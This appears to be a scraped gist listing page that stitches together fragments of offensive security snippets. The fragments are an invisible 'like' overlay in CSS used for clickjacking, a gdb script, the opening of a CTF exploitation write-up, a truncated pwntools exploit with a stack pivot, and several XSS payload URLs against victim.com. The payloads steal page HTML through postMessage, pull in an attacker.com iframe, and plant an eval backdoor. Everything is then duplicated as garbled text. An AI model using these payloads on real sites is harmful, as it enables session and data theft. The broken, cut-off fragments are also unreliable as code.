OMAR ancat

## gist:11164179
<style>
.like{
position:absolute;
-moz-transform: scale(2,1);
-webkit-transform: scale(2,1);
-ms-transform: scale(2,1);
opacity:.0;
top:18%;
left:27%;
}

## gist:11164195
?<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>http://24.media.tumblr.com</title>


## gist:0d4b7f8740ae6faa6cc3
set $root = 0x804c36c

# first element
break *0x08049030
commands
    silent
    printf "allocated first_node->name @ 0x%x\n", $eax
    continue
end
break *0x0804903D

## Kendall.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                ancat
                / Kendall.md
            
            
              Last active
              August 29, 2015 14:16
            
          
    Kendall

Kendall was a 300 point "red" challenge - an exploitable. This was a pretty involved challenge but it was simple once you realized what you had to do. Launching the binary would start a forking server for some DHCP Management Console.

Playing around with the console, it's clear that authenticating is going to be integral to solving the challenge. The authenticate function opens a password.txt file and compares it with your input. You would probably be able to use the strcmp as a timing oracle to brute force the password, but that's kind of lame.
While reversing, we noticed the same strange function being used to read user input being used everywhere. Strange, mostly because it only accepted a size parameter. It didn't accept a destination buffer nor did it allocate space for one - it just used the same statically sized 128 byte long buffer in the .bss segment.


## exploit250.py
from pwn import *
import sys

lei = lambda x: struct.pack('I', x);
stack_chk = 0x0804B01C # location of stack_chk in the got
ret = 0x08048D89       # stack pivot (sub esp, 0x1c; pop; pop; pop; pop; ret;)

live = True

if live:

## gist:2862016
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(document.body.innerHTML, '*')</script>

## gist:2862003
http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/" id="someframe"></iframe><script>document.getElementById('someframe').contentWindow.postMessage(document.body.innerHTML, '*')</script>

## gist:2861997
http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/"></iframe><script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>

## gist:2862020
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(function() {var x=new XMLHttpRequest();x.open('GET','/other/page.html',false);x.send();return x.responseText}(), '*')</script>

## gist:2862041
<script>
    var w = window.open("http://www.victim.com/vulnerable.php?string=<script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>", "somewindow");
    w.postMessage("window.opener.postMessage(document.body.innerHTML, '*')", "*");
</script>
	<style>
	.like{
	position:absolute;
	-moz-transform: scale(2,1);
	-webkit-transform: scale(2,1);
	-ms-transform: scale(2,1);
	opacity:.0;
	top:18%;
	left:27%;
	}
	?<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
	<title>http://24.media.tumblr.com</title>
	set $root = 0x804c36c

	# first element
	break *0x08049030
	commands
	silent
	printf "allocated first_node->name @ 0x%x\n", $eax
	continue
	end
	break *0x0804903D
	from pwn import *
	import sys

	lei = lambda x: struct.pack('I', x);
	stack_chk = 0x0804B01C # location of stack_chk in the got
	ret = 0x08048D89 # stack pivot (sub esp, 0x1c; pop; pop; pop; pop; ret;)

	live = True

	if live:
	<script>
	var w = window.open("http://www.victim.com/vulnerable.php?string=<script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>", "somewindow");
	w.postMessage("window.opener.postMessage(document.body.innerHTML, '')", "");
	</script>